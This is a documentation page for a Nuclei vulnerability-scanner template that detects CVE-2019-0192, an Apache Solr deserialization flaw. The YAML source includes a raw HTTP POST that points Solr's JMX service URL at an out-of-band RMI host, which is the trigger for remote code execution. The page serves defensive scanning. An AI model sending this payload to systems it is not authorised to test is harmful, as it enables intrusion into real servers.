Skip to content
Nuclei Templates

Apache Solr - Deserialization of Untrusted Data

ID: CVE-2019-0192

Severity: critical

Author: hnd3884

Tags: cve,cve2019,apache,solr,deserialization,rce,oast

Description

Section titled “Description”

In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr’s unsafe deserialization to trigger remote code execution on the Solr side.

YAML Source

Section titled “YAML Source”
id: CVE-2019-0192


info:
  name: Apache Solr - Deserialization of Untrusted Data
  author: hnd3884
  severity: critical
  description: |
    In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
  reference:
    - https://github.com/Imanfeng/Apache-Solr-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2019-0192
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-0192
    cwe-id: CWE-502
    epss-score: 0.94754
    epss-percentile: 0.99337
    cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: solr
    shodan-query: title:"Solr"
    fofa-query: title="Solr
  tags: cve,cve2019,apache,solr,deserialization,rce,oast


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: json
        name: core_name
        json:
          - '.status | .[].name'
        internal: true


  - raw:
      - |
        POST /solr/{{core_name}}/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "javax.management.remote.rmi")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 500'
        condition: and
# digest: 4b0a00483046022100f13ac013aa278dbe65365ce3e0b45b65d04f1e7cb0e4891ea66c5516dfc64d3f022100d78046f9c01f37efe8be4c0c19d4b08a9369d3c35c0e5ee087e0d1b7c8b458d2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-0192.yaml"

View on Github